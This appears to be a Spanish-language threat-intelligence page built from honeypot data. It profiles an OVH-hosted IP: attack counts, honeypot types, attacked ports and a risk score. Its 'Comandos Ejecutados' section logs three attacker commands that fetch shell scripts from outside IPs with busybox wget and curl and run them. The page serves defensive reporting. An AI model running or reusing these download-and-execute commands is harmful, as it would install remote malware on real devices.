TROYANOSYVIRUS
Amenaza ActivaALTO

176.65.139.20

Pais de Origen🇸🇬 Singapur
Primera Deteccion2/2/2026
Ultima Actividad23/2/2026
ISPOVH SAS
🎯
38
Ataques Totales
🔌
12
Puertos
📡
6
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇸🇬 Singapur
Ciudad
Desconocida
ASN
AS16276
ISP
OVH SAS

Tipos de Ataque

cowrie
honeyaml
adbhoney
dionaea
tanner
honeytrap

Puertos Atacados

2380813000300155005555603617000170014563456575

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://176.65.139.21/file/w.sh; sh w.sh; curl http://176.65.139.21/file/c.sh; sh c.sh2x
$cd /data/local/tmp/; busybox wget http://130.12.180.120/file/w.sh; sh w.sh; curl http://130.12.180.120/file/c.sh; sh c.sh1x
$cd /data/local/tmp/ || cd /tmp ||cd /var/run||cd /mnt||cd /root || cd /; busybox wget -q http://130.12.180.151/file/w.sh; sh w.sh; curl -O http://130.12.180.151/file/c.sh; sh c.sh;1x

Evaluacion de Riesgo

60
/100
BajoMedioAltoCritico